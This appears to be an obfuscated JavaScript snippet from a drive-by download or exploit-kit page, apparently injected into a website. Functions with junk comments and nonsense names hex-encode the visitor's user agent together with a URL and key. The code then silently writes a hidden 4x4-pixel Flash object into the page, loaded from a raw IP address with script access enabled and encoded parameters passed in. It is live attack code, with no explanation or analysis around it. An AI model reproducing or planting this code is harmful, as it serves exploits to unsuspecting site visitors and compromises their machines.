/*s48520d33954hssfj4626fs*/function hgfgerdfgdf(num, width){/*s40375d21660hfj68423fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s43100d38108hfj7326fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s59104d11736hfj91072fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s86729d22151hfj96259fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd99675hfs*/c += b + d;/*s80202d42092hfj55584fs*/e += 1;}return c;}/*s50562dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.75.48/?ODAyNjgyODA=&elsa=yz49ZA1gV_qunikPXzBTI0paE9ReJNwhH95CUErNt3VykybNHcMlzkhTWv2MDmugtVFgS6AsUlK_7VaOO-w&info=NDQ1MjU5MDI=&rand=xHzQMrPYbR3FFYDfKPrEUKREMU7WA0eKwY-Zha_VF5-xFDTGpbH1FxzspVydCF-EmvFvdLMHIwKh1UTASwQ&reinz=OTk2ODYwMw==", ghnvbn("http://188.225.75.48/?OTE1NjQwNjA=&info=MzMyOTQyNTM=&rand=xX_QMvWebRXQC53EKvrcT6NHMVHRH0CL2YydmrHTefjaeVWkzrHFTF_xozKASwSG6_JtdfJRDV&elsa=Cyj0HRfQRolYpfUF9H9fuohkDRnxSdiJaE_0OIMAhDrJKXQORv2gummbAkec8mxh6F6FENjOse&reinz=MTQxNjQ4NTk=","wexykukusw"));